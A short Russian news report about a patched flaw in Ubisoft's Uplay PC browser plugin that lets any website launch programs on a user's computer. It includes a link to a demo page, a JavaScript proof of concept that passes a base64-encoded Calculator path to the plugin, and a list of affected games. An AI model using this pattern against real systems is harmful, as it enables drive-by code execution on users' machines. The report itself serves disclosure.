В игровом приложении Uplay от компании Ubisoft обнаружена ошибка, которая позволяет с любого сайта получить контроль над компьютером пользователя.

Демо-страница, которая показывает работу бэкдора (запускает на вашем компьютере приложение «Калькулятор»):

http://pastehtml.com/view/c6gxl1a79.html

Код:

var x = document.createElement('OBJECT');
x.setAttribute("type", "application/x-uplaypc");
document.body.appendChild(x);
x.open("-orbit_product_id 1 -orbit_exe_path QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ== -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play")

Бэкдор можно сравнить с известным руткитом Sony BMG. Вместе с играми Ubisoft на компьютер пользователя устанавливается программа Uplay PC, которая создаёт плагин для браузера, предоставляющий неограниченно широкие полномочия для сайтов, которые обращаются к нему.

Список игр Ubisoft:

Assassin’s Creed II
Assassin’s Creed: Brotherhood
Assassin’s Creed: Project Legacy
Assassin’s Creed Revelations
Assassin’s Creed III
Beowulf: The Game
Brothers in Arms: Furious 4
Call of Juarez: The Cartel
Driver: San Francisco
Heroes of Might and Magic VI
Just Dance 3
Prince of Persia: The Forgotten Sands
Pure Football
R.U.S.E.
Shaun White Skateboarding
Silent Hunter 5: Battle of the Atlantic
The Settlers 7: Paths to a Kingdom
Tom Clancy’s H.A.W.X. 2
Tom Clancy’s Ghost Recon: Future Soldier
Tom Clancy’s Splinter Cell: Conviction
Your Shape: Fitness Evolved

Компания Ubisoft уже выпустила патч для Uplay, закрывающий эту уязвимость.

Оставить мнение